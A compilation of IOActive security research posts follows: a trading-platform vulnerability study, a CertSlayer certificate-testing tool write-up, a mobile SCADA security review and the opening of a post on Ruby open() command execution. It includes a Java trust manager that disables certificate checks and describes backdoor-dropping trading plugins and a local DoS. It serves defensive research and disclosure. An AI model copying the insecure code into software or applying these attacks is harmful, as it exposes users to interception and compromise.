IOActive Expands Secure Development Lifecycle Services with Continuous Penetration Testing
New Service Model Designed to Enable Enterprise DevSecOps to Build a Robust Secure Development Lifecycle
Seattle, WA – May 21, 2020 – IOActive, Inc., the worldwide leader in research-fueled security services, announced today the introduction of their new Continuous Penetration Testing (CPT) services. This new style of testing is designed to address the challenge of integrating security testing into an agile development model. As many organizations have moved to Continuous Integration and Continuous Deployment (CI/CD) processes the independent validation and verifications processes have not aligned with that enhanced agility until now.
“As enterprises have embraced agile development over waterfall, they have struggled to integrate security testing throughout the process. Time and time again it has been proven that weaving security throughout the development cycle produces stronger products and costs less in the end. To be effective, penetration testing models have to evolve to better align with how enterprises approach development, deployment, and operations,” said John Sheehy, SVP of Research and Strategy at IOActive. “We’ve worked closely with our enterprise customers to refine this model to deliver the ongoing support they need to build highly secure products in an agile model.”
Understanding that ongoing testing is critical in secure product development – just as agile focuses on small sprints and changes – CPT focuses on those associated code, network, infrastructure, application, and configuration changes early, before or shortly after they go to production. The flexibility of these services is designed to provide ongoing, cost-effective testing of components as they are developed—resulting in more robust and secure products. These new services are an extension of IOActive’s suite of Secure Development Lifecyle services that include full-stack penetration testing and threat modeling, design and architecture reviews, as well as program development and management. The CPT offering is best utilized on certain parts of the technology stack such as externally-accessible web applications, mobile applications, web services, network, and IT infrastructure.
This announcement complements IOActive’s recent Pen-testing Protection Program designed to help global small businesses continue necessary penetration testing to support cybersecurity risk management—as they deal with the financial impacts imposed by the stay-at-home orders imposed to keep their communities safe. The new CPT offering is designed to support larger organizations by providing flexible penetration testing services aligned with the CI/CD model favored by DevOps teams, while providing for the cybersecurity risk management needed by the SecDevOps team. When properly employed, CPT allows organizations to engage in effective expense management as well as enhancing the cadence and agility of external penetration testing.
“Many organizations are currently facing the existential threat of a prolonged pandemic-compromised economy. Unfortunately, this is a reminder that often it’s the unexpected threats that can be the most impactful, and as organizations face the daunting task of keeping business going, we want to add new services and flexible programs to help our customers stay viable and secure. CI/CD/CPT provides organizations with an integrated agile approach consisting of agile development along with an agile, independent assessment of cybersecurity risk” Sheehy said.
As part of IOActive’s mission to make the world a safer and more secure place, new infrastructure and tools were developed and deployed to ensure the entire suite of services can be delivered remotely to allow customers to keep their teams healthier at home as long as deemed necessary.
About IOActive
IOActive is a trusted partner for Global 1000 enterprises, providing research-fueled security services across all industries. Our cutting-edge security teams provide highly specialized technical and programmatic services including full stack penetration testing, program efficacy assessments, and hardware hacking. IOActive brings a unique attacker’s perspective to every client engagement to maximize security investments and improve client’s overall security posture and business resiliency. Founded in 1998, IOActive is headquartered in Seattle with global operations. For more information, visit ioactive.com.
RESEARCH | August 7, 2018
Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies
By
Alejandro Hernandez
This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details to the research.
Disclaimer
Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.
This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.
Introduction
The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
The valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.
Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Send buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.
Scope
My analysis started mid-2017 and concluded in July 2018. It encompassed the following platforms; many of them are some of the most used and well-known trading platforms, and some allow cryptocurrency trading:
16 Desktop applications
34 Mobile apps
30 Websites
These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer the three types of platforms, however, in some cases only one or two were reviewed due to certain limitations:
Ally Financial
AvaTrade
Binance
Bitfinex
Bitso
Bittrex
Bloomberg
Capital One
Charles Schwab
Coinbase
easyMarkets
eSignal
ETNA
eToro
E-TRADE
ETX Capital
ExpertOption
Fidelity
Firstrade
FxPro
GBMhomebroker
Grupo BMV
IC Markets
Interactive Brokers
IQ Option
Kraken
com
Merrill Edge
MetaTrader
Net
NinjaTrader
OANDA
Personal Capital
Plus500
Poloniex
Robinhood
Scottrade
TD Ameritrade
TradeStation
Yahoo! Finance
Devices used:
Windows 7 (64-bit)
Windows 10 Home Single (64-bit)
iOS 10.3.3 (iPhone 6) [not jailbroken]
iOS 10.4 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
Basic security controls/features were reviewed that represent just the tip of the iceberg when compared to more exhaustive lists of security checks per platform.
Results
Unfortunately, the results proved to be much worse compared with applications in retail banking. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.
Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.
While testing I noted a basic correlation: the biggest brokers are the ones that invest more in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.
Based on my testing results and opinion, the following trading platforms are the most secure:
Broker
Platforms
TD Ameritrade
Web and mobile
Charles Schwab
Web and mobile
Merrill Edge
Web and mobile
MetaTrader 4/5
Desktop and mobile
Yahoo! Finance
Web and mobile
Robinhood
Web and mobile
Bloomberg
Mobile
TradeStation
Mobile
Capital One
Mobile
FxPro cTrader
Desktop
IC Markets cTrader
Desktop
Ally Financial
Web
Personal Capital
Web
Bitfinex
Web and mobile
Coinbase
Web and mobile
Bitso
Web and mobile
The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, Denial of Service, authentication, and/or session management problems. Despite the fact that these platforms implement good security features, they also have areas that should be addressed to improve their security.
Following the platforms I consider must improve in terms of security:
Broker
Platforms
Interactive Brokers
Desktop, web and mobile
IQ Option
Desktop, web and mobile
AvaTrade
Desktop and mobile
E-TRADE
Web and mobile
eSignal
Desktop
TD Ameritrade’s Thinkorwim
Desktop
Charles Schwab
Desktop
TradeStation
Desktop
NinjaTrader
Desktop
Fidelity
Web
Firstrade
Web
Plus500
Web
Markets.com
Mobile
Unencrypted Communications
In 9 desktop applications (64%) and in 2 mobile apps (6%), transmitted data unencrypted was observed. Most applications transmit most of the sensitive data in an encrypted way, however, there were some cases where cleartext data could be seen in unencrypted requests.
Among the data seen unencrypted are passwords, balances, portfolio, personal information and other trading-related data. In most cases of unencrypted transmissions, HTTP in plaintext was seen, and in others, old proprietary protocols or other financial protocols such as FIX were used.
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
For example, the follow application uses unencrypted HTTP. In the screenshot, a buy order:
Another interesting example was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data. During the testing, it was noted that Data Manager authenticates over an unencrypted protocol on the TCP port 2189, apparently developed in 1999.
As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.
The main eSignal login screen also authenticates through a cleartext channel:
FIX is a protocol initiated in 1992 and is one of the industry standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it through a secure channel, however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.
A broker that supports FIX:
There are some cases where the application encrypts the communication channel, except in certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all the communication, but not that used by iBot, the robot assistant that receives text or voice commands, which sends the instructions to the server embedded in a FIX protocol message in cleartext:
News related to the positions were also observed in plaintext:
Another instance of an application that uses encryption but not for certain channels is this one, Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server in a scheduled basis through unencrypted HTTP:
A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.
Others appear to implement their own binary protocols, such as Charles Schwab, however, symbols in watchlists or quoted symbols could be seen in cleartext:
Interactive Brokers supports encryption but by default uses an insecure channel; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and some sensitive data will be sent and received without encryption:
Passwords Stored Unencrypted
In 7 mobile apps (21%) and in 3 desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract them, though. This access could be either physical or through malware.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easily), log in through the web-based trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (+75%) support two-factor authentication (2FA), however, it’s not enabled by default, the user must go to the configuration and enable it to receive authorization codes by text messages or email. Hence, if 2FA is not enabled in the account, it’s possible for an attacker, that knows the password already, to link a new bank account and withdraw the money from sold securities.
The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:
Base64 is not encryption:
In some cases, the password was sent to the server as a GET parameter, which is also insecure:
One PIN for login and unlocking the app was also seen:
In IQ Option, the password was stored completely unencrypted:
However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:
Trading and Account Information Stored Unencrypted
In the trading context, operational or strategic data must not be stored unencrypted nor sent to the any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though. This access could be either physical or through malware.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
The following screenshots show applications that store sensitive data unencrypted:
Balances:
Investment portfolio:
Buy/sell orders:
Watchlists:
Recently quoted symbols:
Other data:
Trading Programming Languages with DLL Import Capabilities
This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.
The following are a few of the trading platforms with their own trading language:
MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
AvaTraceAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
(FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)
Nevertheless, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to only execute plugins from trusted sources. However, there are Internet tutorials claiming, “to make you rich overnight” with certain trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox to allow DLL imports. Innocent non-tech savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.
Following a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:
Another basic example is NinjaTrader, which simply allows OS commands through C#’s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe executed from the chart initialization routine:
Denial of Service
Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connections handling of such services.
A common error is not implementing a limit of the number of concurrent connections. If there is no limit of concurrent connections on a TCP daemon, applications are susceptible to denial-of-service (DoS) or other type of attacks depending on the nature of the applications.
For example, TD Ameritrade’s Thinkorswim TCP-Orders Server listens on the TCP port 2000 in the localhost interface, and there is no limit for connections nor a waiting time between orders. This leads to the following problems:
Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
A NULL pointer dereference is triggered and an error report (.zip file) is created.
Regardless, it listens on the local interface only. There are different ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.
Memory leakage could be easily triggered by creating as many connections as possible:
A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data; therefore, availability is the most important asset:
It’s recommended to implement a configuration item to allow the user to control the behavior of the TCP order server, such as controlling the maximum number of orders sent per minute as well as the number of seconds to wait between orders to avoid bottlenecks.
The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:
Session Still Valid After Logout
Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.
In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:
Authentication
While most web-based trading platforms support 2FA (+75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Weak Password Policies
Some institutions let the users choose easily guessable passwords. For example:
The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.
In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client-side only, hence, it is possible to intercept a request and send a weak password to the server:
Automatic Logout/Lockout for Idle Sessions
Most web-based platforms logout/lockout the user automatically, but this is not the case for desktop (43%) and mobile apps (25%). This is a security control that forces the user to authenticate again after a period of idle time.
Privacy Mode
This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.
The following images show before and after enabling privacy mode in Thinkorswim for mobile:
Hardcoded Secrets in Code and App Obfuscation
16 Android .apk installers (47%) were easily reverse engineered to human-readable code since they lack of obfuscation. Most Java and .NET-based desktop applications were also reverse-engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.
The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.
In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) have traces (hostnames and IPs) about the internal development and testing environments where they were made or tested. Some hostnames are reachable from the Internet and since they’re testing systems they could lack of proper protections.
SSL Certificate Validation
11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on their phones, though.
The ones that verify the certificate normally do not transmit any data, however, only Charles Schwab allows the user to use the app with the provided certificate:
Lack of Anti-exploitation Mitigations
ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack Canaries are used to identify if the stack has been corrupted. These security features make much more difficult for memory corruption bugs to be exploited and execute arbitrary code.
The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, that these features are only enabled in some components, not the entire application. In other cases, components that handle network connections also lack these flags.
Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.
Other Weaknesses
More issues were found in the platforms. For more details, please refer to the white paper.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
For more statistics, please refer to the white paper.
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017 we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher risks vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.
As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.
TD Ameritrade and Charles Schwab were the brokers that communicated more with IOActive for resolving the reported issues.
For a table with the current status of the responsible disclosure process, please refer to the white paper.
Conclusions and Recommendations
Trading platforms are less secure than the applications seen in retail banking.
There’s still a long way to go to improve the maturity level of security in trading technologies.
End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
Brokerage firms should also offer security guidance in their online education centers.
Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Rating organizations should include security in their reviews.
Side Note
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
tl;dr: Certslayer allows testing of how an application handles SSL certificates and whether or not it is verifying relevant details on them to prevent MiTM attacks: https://github.com/n3k/CertSlayer.
During application source code reviews, we often find that developers forget to enable all the security checks done over SSL certificates before going to production. Certificate-based authentication is one of the foundations of SSL/TLS, and its purpose is to ensure that a client is communicating with a legitimate server. Thus, if the application isn’t strictly verifying all the relevant details of the certificate presented by a server, it is susceptible to eavesdropping and tampering from any attacker having a suitable position in the network.The following Java code block nullifies all the certificate verification checks:
X509TrustManager local1 = new X509TrustManager()
{
public void checkClientTrusted(X509Certificate[]
paramAnonymousArrayOfX509Certificate,
String paramAnonymousString)
throws CertificateException { }
public void checkServerTrusted(X509Certificate[]
paramAnonymousArrayOfX509Certificate,
String paramAnonymousString)
throws CertificateException { }
public X509Certificate[] getAcceptedIssuers()
{
return null;
}
}
Similarly, the following python code using urllib2 disables SSL verification:
These issues are not hard to spot while reading code, but what about a complete black box approach? Here is where Certslayer comes to the rescue.
How does it work?
Proxy Mode
Certslayer starts a proxy server and monitors for specified domains. Whenever a client makes a request to a targeted domain, the proxy redirects the request to an internal web server, presenting a special certificate as a test-case. If the internal web server receives the request, it means the client accepted the test certificate, and the connection was successful at the TLS level. On the other hand, if the internal web server doesn’t receive a request, it means the client rejected the presented certificate and aborted the connection.
For testing mobile applications, the proxy mode is very useful. All a tester needs to do is install the certificate authority (Certslayer CA) in the phone as trusted and configure the system proxy before running the tool. Simply by using the application, generates requests to its server’s backend which are trapped by the proxy monitor and redirected accordingly to the internal web server. This approach also reveals if there is any sort of certificate pinning in place, as the request will not succeed when a valid certificate signed by the CA gets presented.
A simple way to test in this mode is to configure the browser proxy and navigate to a target domain. For example, the next command will start the proxy mode on port 9090 and will monitor requests to www.ioactive.com:
The error code explains the problem: SEC_ERROR_BAD_SIGNATURE, which matches the first test-case in the list. At this point, Certslayer has already prepared the next test-case in the list. By reloading the page with F5, we get the next result.
At the end, a csv file will generate containing the results of each test-case. The following table summarizes them for this example:
Stand-alone Mode
Proxy mode is not useful when testing a web application or web service that allows fetching resources from a specified endpoint. In most instances, there won’t be a way to install a root CA at the application backend for doing these tests. However, there are applications that include this feature in their design, like, for instance, cloud applications that allow interacting with third party services.
In these scenarios, besides checking for SSRF vulnerabilities, we also need to check if the requester is actually verifying the presented certificate. We do this using Certslayer standalone mode. Standalone mode binds a web server configured with a test-certificate to all network interfaces and waits for connections.
I recently tested a cloud application that allowed installing a root CA to enable interaction with custom SOAP services served over HTTPS. Using the standalone mode, I found the library in use wasn’t correctly checking the certificate common name (CN). To run the test-suite, I registered a temporary DNS name (http://ipq.co/) to my public IP address and ran Certslayer with the following command:
+ Setting up WebServer with Test: Trusted CA Invalid Signature
>> Hit enter for setting the next TestCase
The command initialized standalone mode listening on port 4444. The test certificates then used j22d1i.ipq.co as the CN. After this, I instructed the application to perform the request to my server:
{“status”:500,”title”:”Problem accessing WSDL description”,”detail”:”We couldn’t open a connection to the service (Describe URL: https://j22d1i.ipq.co:4444/). Reason: Signature does not match. Check the availability of the service and try again”}
The connection was refused. The server error described the reason why: the CA signature didn’t match. Hitting enter in the python console made the tool prepare the next test case:
+ Killing previous server
j22d1i.ipq.co,Trusted CA Invalid Signature,Certificate Rejected,Certificate Rejected
+ Setting up WebServer with Test: Signed with CertSlayer CA
>> Hit enter for setting the next TestCase
Here, the connection succeeded because the tool presented a valid certificate signed with Certslayer CA:
Server Response:
{“status”:500,”detail”: “We couldn’t process the WSDL https://j22d1i.ipq.co:4444/. Verify the validity of the WSDL file and that it’s available in the specified location.”}
Certslayer output:
j22d1i.ipq.co,Signed with CertSlayer CA,Certificate Accepted,Certificate Accepted
When the web server is configured with a certificate with a wrong CN, the expected result is that the client will abort the connection. However, this particular application accepted the certificate anyway: + Setting up WebServer with Test: Wrong CNAME
As before, a csv file was generated containing all the test cases with the actual and expected results. For this particular engagement, the result was:
A similar tool exists called tslpretense, the main difference is that, instead of using a proxy to intercept requests to targeted domains, it requires configuring the test runner as a gateway so that all traffic the client generates goes through it. Configuring a gateway host this way is tedious, which is the primary reason Certslayer was created.
Two years ago, we assessed 20 mobile applications that worked with ICS software and hardware. At that time, mobile technologies were widespread, but Internet of Things (IoT) mania was only starting. Our research concluded the combination of SCADA systems and mobile applications had the potential to be a very dangerous and vulnerable cocktail. In the introduction of our paper, we stated “convenience often wins over security. Nowadays, you can monitor (or even control!) your ICS from a brand-new Android [device].”
Today, no one is surprised at the appearance of an IIoT. The idea of putting your logging, monitoring, and even supervisory/control functions in the cloud does not sound as crazy as it did several years ago. If you look at mobile application offerings today, many more ICS- related applications are available than two years ago. Previously, we predicted that the “rapidly growing mobile development environment” would redeem the past sins of SCADA systems. The purpose of our research is to understand how the landscape has evolved and assess the security posture of SCADA systems and mobile applications in this new IIoT era.
SCADA and Mobile Applications ICS infrastructures are heterogeneous by nature. They include several layers, each of which is dedicated to specific tasks. Figure 1 illustrates a typical ICS structure.
Figure 1: Modern ICS infrastructure including mobile apps
Mobile applications reside in several ICS segments and can be grouped into two general families: Local (control room) and Remote.
Local Applications Local applications are installed on devices that connect directly to ICS devices in the field or process layers (over Wi-Fi, Bluetooth, or serial). Remote Applications Remote applications allow engineers to connect to ICS servers using remote channels, like the Internet, VPN-over-Internet, and private cell networks. Typically, they only allow monitoring of the industrial process; however, several applications allow the user to control/supervise the process. Applications of this type include remote SCADA clients, MES clients, and remote alert applications. In comparison to local applications belonging to the control room group, which usually operate in an isolated environment, remote applications are often installed on smartphones that use Internet connections or even on personal devices in organizations that have a BYOD policy. In other words, remote applications are more exposed and face different threats.
Unauthorized physical access to the device or “virtual” access to device data
Communication channel compromise (MiTM)
Application compromise
Table 1 summarizes the threat types.
Table 1: SCADA mobile client threat list
Attack Types
Based on the threats listed above, attacks targeting mobile SCADA applications can be sorted into two groups.
Directly/indirectly influencing an industrial process or industrial network infrastructure
This type of attack could be carried out by sending data that would be carried over to the field segment devices. Various methods could be used to achieve this, including bypassing ACL/ permissions checks, accessing credentials with the required privileges, or bypassing data validation.
Compromising a SCADA operator to unwillingly perform a harmful action on the system
The core idea is for the attacker to create environmental circumstances where a SCADA system operator could make incorrect decisions and trigger alarms or otherwise bring the system into a halt state.
Testing Approach
Similar to the research we conducted two years ago, our analysis and testing approach was based on the OWASP Mobile Top 10 2016. Each application was tested using the following steps:
Perform analysis and fill out the test checklist
Perform client and backend fuzzing
If needed, perform deep analysis with reverse engineering
We did not alter the fuzzing approach since the last iteration of this research. It was discussed in depth in our previous whitepaper, so its description is omitted for brevity.
We improved our test checklist for this assessment. It includes:
Application purpose, type, category, and basic information
Permissions
Password protection
Application intents, exported providers, broadcast services, etc.
Native code
Code obfuscation
Presence of web-based components
Methods of authentication used to communicate with the backend
Correctness of operations with sessions, cookies, and tokens
SSL/TLS connection configuration
XML parser configuration
Backend APIs
Sensitive data handling
HMI project data handling
Secure storage
Other issues
Reviewed Vendors
We analyzed 34 vendors in our research, randomly selecting SCADA application samples from the Google Play Store. We did, however, favor applications for which we were granted access to the backend hardware or software, so that a wider attack surface could be tested.
Additionally, we excluded applications whose most recent update was before June 2015, since they were likely the subject of our previous work. We only retested them if there had been an update during the subsequent two years.
Findings
We identified 147 security issues in the applications and their backends. We classified each issue according to the OWASP Top Ten Mobile risks and added one additional category for backend software bugs.
Table 4 presents the distribution of findings across categories. The “Number of Issues” column reports the number of issues belonging to each category, while the “% of Apps” column reports how many applications have at least one vulnerability belonging to each category.
Table 4. Vulnerabilities statistics
In our white paper, we provide an in-depth analysis of each category, along with examples of the most significant vulnerabilities we identified. Please download the white paper for a deeper analysis of each of the OWASP category findings. Remediation And Best Practices In addition to the well-known recommendations covering the OWASP Top 10 and OWASP Mobile Top 10 2016 risks, there are several actions that could be taken by developers of mobile SCADA clients to further protect their applications and systems. In the following list, we gathered the most important items to consider when developing a mobile SCADA application:
Always keep in mind that your application is a gateway to your ICS systems. This should influence all of your design decisions, including how you handle the inputs you will accept from the application and, more generally, anything that you will accept and send to your ICS system.
Avoid all situations that could leave the SCADA operators in the dark or provide them with misleading information, from silent application crashes to full subverting of HMI projects.
Follow best practices. Consider covering the OWASP Top 10, OWASP Mobile Top 10 2016, and the 24 Deadly Sins of Software Security.
Do not forget to implement unit and functional tests for your application and the backend servers, to cover at a minimum the basic security features, such as authentication and authorization requirements.
Enforce password/PIN validation to protect against threats U1-3. In addition, avoid storing any credentials on the device using unsafe mechanisms (such as in cleartext) and leverage robust and safe storing mechanisms already provided by the Android platform.
Do not store any sensitive data on SD cards or similar partitions without ACLs at all costs Such storage mediums cannot protect your sensitive data.
Provide secrecy and integrity for all HMI project data. This can be achieved by using authenticated encryption and storing the encryption credentials in the secure Android storage, or by deriving the key securely, via a key derivation function (KDF), from the application password.
Encrypt all communication using strong protocols, such as TLS 1.2 with elliptic curves key exchange and signatures and AEAD encryption schemes. Follow best practices, and keep updating your application as best practices evolve. Attacks always get better, and so should your application.
Catch and handle exceptions carefully. If an error cannot be recovered, ensure the application notifies the user and quits gracefully. When logging exceptions, ensure no sensitive information is leaked to log files.
If you are using Web Components in the application, think about preventing client-side injections (e.g., encrypt all communications, validate user input, etc.).
Limit the permissions your application requires to the strict minimum.
Implement obfuscation and anti-tampering protections in your application.
Conclusions Two years have passed since our previous research, and things have continued to evolve. Unfortunately, they have not evolved with robust security in mind, and the landscape is less secure than ever before. In 2015 we found a total of 50 issues in the 20 applications we analyzed and in 2017 we found a staggering 147 issues in the 34 applications we selected. This represents an average increase of 1.6 vulnerabilities per application. We therefore conclude that the growth of IoT in the era of “everything is connected” has not led to improved security for mobile SCADA applications. According to our results, more than 20% of the discovered issues allow attackers to directly misinform operators and/or directly/ indirectly influence the industrial process.
In 2015, we wrote:
SCADA and ICS come to the mobile world recently, but bring old approaches and weaknesses. Hopefully, due to the rapidly developing nature of mobile software, all these problems will soon be gone.
We now concede that we were too optimistic and acknowledge that our previous statement was wrong. Over the past few years, the number of incidents in SCADA systems has increased and the systems become more interesting for attackers every year. Furthermore, widespread implementation of the IoT/IIoT connects more and more mobile devices to ICS networks. Thus, the industry should start to pay attention to the security posture of its SCADA mobile applications, before it is too late. For the complete analysis, please download our white paper here. Acknowledgments
Many thanks to Dmitriy Evdokimov, Gabriel Gonzalez, Pau Oliva, Alfredo Pironti, Ruben Santamarta, and Tao Sauvage for their help during our work on this research.
About Us
Alexander Bolshev
Alexander Bolshev is a Security Consultant for IOActive. He holds a Ph.D. in computer security and works as an assistant professor at Saint-Petersburg State Electrotechnical University. His research interests lie in distributed systems, as well as mobile, hardware, and industrial protocol security. He is the author of several white papers on topics of heuristic intrusion detection methods, Server Side Request Forgery attacks, OLAP systems, and ICS security. He is a frequent presenter at security conferences around the world, including Black Hat USA/EU/UK, ZeroNights, t2.fi, CONFIdence, and S4.
Ivan Yushkevich
Ivan is the information security auditor at Embedi (http://embedi.com). His main area of interest is source code analysis for applications ranging from simple websites to enterprise software. He has vast experience in banking systems and web application penetration testing.
IOActive
IOActive is a comprehensive, high-end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world-renowned consulting and research teams deliver a portfolio of specialist security services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Global 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founded in 1998, IOActive is headquartered in Seattle, USA, with global operations through the Americas, EMEA and Asia Pac regions. Visit for more information. Read the IOActive Labs Research Blog. Follow IOActive on Twitter.
Embedi
Embedi expertise is backed up by extensive experience in security of embedded devices, with special emphasis on attack and exploit prevention. Years of research are the genesis of the software solutions created. Embedi developed a wide range of security products for various types of embedded/smart devices used in different fields of life and industry such as: wearables, smart home, retail environments, automotive, smart buildings, ICS, smart cities, and others. Embedi is headquartered in Berkeley, USA. Visit for more information and follow Embedi on Twitter.
Hidden Exploitable Behaviors in Programming Languages
By
Fernando Arnaboldi
In February 28th 2015 Egor Homakov wrote an article[1] exposing the dangers in the open() function from Ruby. The function is commonly used when requesting URLs programmatically with the open-uri library. However, instead of requesting URLs you may end up executing operating system commands.
Consider the following Ruby script named open-uri.rb:
require ‘open-uri’
print open(ARGV[0]).read
The following command requests a web page:
# ruby open-uri.rb “https://ioactive.com”
And the following output is shown:
<!DOCTYPE HTML>
<!–[if lt IE 9]><html class=”ie”><![endif]–>
<!–[if !IE]><!–><html><!–<![endif]–><head>
<meta charset=”UTF-8″>
<title>IOActive is the global leader in cybersecurity, penetration testing, and computer services</title>
[…SNIP…]
